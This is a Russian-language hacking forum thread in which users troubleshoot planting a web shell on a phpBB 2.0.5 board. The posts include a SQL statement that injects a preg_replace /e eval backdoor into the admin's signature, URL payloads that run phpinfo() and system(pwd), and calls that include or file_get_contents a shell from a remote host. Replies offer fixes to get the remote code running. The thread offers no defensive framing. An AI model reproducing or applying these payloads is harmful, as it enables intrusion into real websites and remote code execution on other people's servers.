 |
|
08.04.2014, 17:27
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
С нами:
8666229
Репутация:
44
|
|
Вечер добрый, не получается залить шелл в phpbb 2.0.5.
Пытаюсь залить через восстановление БД:
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
.
И пхпинфо прекрасно отображается так:
forum/profile.php?mode=editprofile&e=phpinfo();
А вот когда таким путем пытаюсь залить сам шелл:
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include("http://site.ru/shell.php")' WHERE user_id=2;
.
Получаю лишь белую, пустую страницу
Прошу Вашей помощи |
|
|
08.04.2014, 17:31
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
С нами:
8666229
Репутация:
44
|
|
Ах да, изначально косякнул в том, что залил шелл туда где пхп исполняется. Сейчас вроде нашел что-то адекватное, но не до конца уверен. Так что буду рад еще совету куда можно загрузить сам шелл, что в последствии уже без проблем загружать на нужный сайт.
|
|
|
|
08.04.2014, 21:00
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от good.god
Ах да, изначально косякнул в том, что залил шелл туда где пхп исполняется. Сейчас вроде нашел что-то адекватное, но не до конца уверен. Так что буду рад еще совету куда можно загрузить сам шелл, что в последствии уже без проблем загружать на нужный сайт.
если allow_url_fopen on
используй file_get_contents();
|
|
|
|
08.04.2014, 21:12
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
С нами:
8666229
Репутация:
44
|
|
Сообщение от Hummer
если allow_url_fopen on
используй file_get_contents();
Да, allow_url_fopen - on
Попробовал через file_get_contents();
Такая конструкция
Код:
forum/profile.php?mode=editprofile&e=eval(file_get_contents(http://site/1.txt));
Возвращаюсь в профайл админа, и никаких результатов.
|
|
|
|
08.04.2014, 21:17
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от good.god
Да, allow_url_fopen - on
Попробовал через file_get_contents();
Такая конструкция
Код:
forum/profile.php?mode=editprofile&e=eval(file_get_contents(http://site/1.txt));
Возвращаюсь в профайл админа, и никаких результатов
. Надо вот так:
forum/profile.php?
mode=editprofile&e=file_get_contents(http://site/1.txt);
а 1.txt должен быть шелом но без тегов:
|
|
|
|
08.04.2014, 21:19
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
С нами:
8666229
Репутация:
44
|
|
Да, и так попробовал. Все верно, теги удалил.
Результат тот же. Реагирует ровно также когда ошибаюсь с синтаксисом. Т.е. ровно ничего не происходит. Работает только команда phpinfo().
|
|
|
|
08.04.2014, 21:53
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от good.god
Да, и так попробовал. Все верно, теги удалил
.
Результат тот же. Реагирует ровно также когда ошибаюсь с синтаксисом. Т.е. ровно ничего не происходит. Работает только команда phpinfo().
пиздец, если у тебя работает phpinfo() Будет работать всё, впиши system(pwd); а дальше отсюда и пляши
|
|
|
|
08.04.2014, 22:55
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
С нами:
8666229
Репутация:
44
|
|
Хе, и system(pwd) также не работает
|
|
|
|
09.04.2014, 00:03
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
С нами:
8666229
Репутация:
44
|
|
Вообщем в чем дело понять не могу. Перепробовал уже все, и copy и include, и кавычки с пробелами через ASCII убирал. В пхп не силен вообще, использовал команды которые найти смог по данной теме.
В итоге результат один, никаких ошибок, просто отображается нормальный профиль админа без изменений. Срабатывает пхпинфо. И все. Что за.
|
|
|
|
09.04.2014, 12:54
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Так а, это, вероятность отключенных функций проверялась? Мне самому такое еще не попадалось, но оно дб прописано в php.ini, "disable_functions".
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
